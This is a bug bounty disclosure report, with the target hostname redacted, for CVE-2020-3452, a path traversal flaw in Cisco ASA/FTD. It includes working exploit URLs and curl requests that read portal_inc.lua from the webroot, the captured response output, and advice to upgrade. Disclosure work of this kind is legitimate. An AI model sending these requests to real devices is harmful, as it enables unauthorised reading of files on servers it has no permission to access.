https://█████ is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability

**Summary:** https://████████ is vulnerable to a [Read-Only Path Traversal Vulnerability](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86) **Description:** Get request parameters at the `/+CSCOT+/translation-table` and the `/+CSCOT+/oem-customization` are not properly sanitized which allows for reading files within the webroot directory that are not intended to be readable. ## Impact An unauthenticated, remote attacker can read sensitive files located inside the webroot directory. ## Step-by-step Reproduction Instructions ### Using Browser 1. Visit https://██████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ in browser and note that you are prompted for a file download. This will be the source code for `portal_inc.lua` which is not normally accessible. 2. To verify you cannot access this file normally, visit https://██████/+CSCOE+/portal_inc.lua and verify that you receive a page that says "Wrong URL". ### Using Curl 1. In a linux terminal, send the following `curl` command: ``` curl -i -s -k -X $'GET' \ -H $'Host: ████████' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ $'https://████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../' ``` and ``` curl -i -s -k -X $'GET' \ -H $'Host: ████' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ $'https://██████████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua' ``` You should receive the following output: ``` HTTP/1.1 200 OK Content-Type: application/octet-stream Transfer-Encoding: chunked Cache-Control: no-cache Pragma: no-cache Connection: Keep-Alive Date: Fri, 24 Jul 2020 04:27:46 GMT X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=31536000; includeSubDomains -- Copyright (C) 2006-2018 by Cisco Systems, Inc. -- Created by [email protected] dofile("/+CSCOE+/include/common.lua") dofile("/+CSCOE+/include/browser_inc.lua") local function compare(a,b) return a["order"]<b["order"] end; function INTERNAL_PASSWORD_ENABLED(name) return false; ``` 2. To verify you should not be able to access this info, run the following `curl` command: ``` curl -i -s -k -X $'GET' \ -H $'Host: █████' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ $'https://███/%2bCSCOE%2b/portal_inc.lua' ``` You should receive the following output: ``` HTTP/1.1 500 Internal Error Cache-Control: no-cache Pragma: no-cache Connection: Close Date: Fri, 24 Jul 2020 04:28:13 GMT X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=31536000; includeSubDomains ``` ## Screenshots in Burpsuite showing the requests succeeding and failing ### Success at https://███/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ which results in disclosure of the source code in `portal_inc.lua` █████████ ### Failure trying to access https://███████/+CSCOE+/portal_inc.lua ███ ## Suggested Mitigation/Remediation Actions Upgrade to the latest version of Cisco ASA or Cisco FTD. ## References https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 https://twitter.com/aboul3la/status/1286012324722155525 ## Impact CVSS Score: Base 7.5 Vector: [CVSS:3.1/CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MPR:X/MUI:X/MS:X/MC:X/MI:X/MA:X](https://tools.cisco.com/security/center/cvssCalculator.x?version=3.1&vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) An unauthenticated, remote attacker can read sensitive files located inside the webroot directory.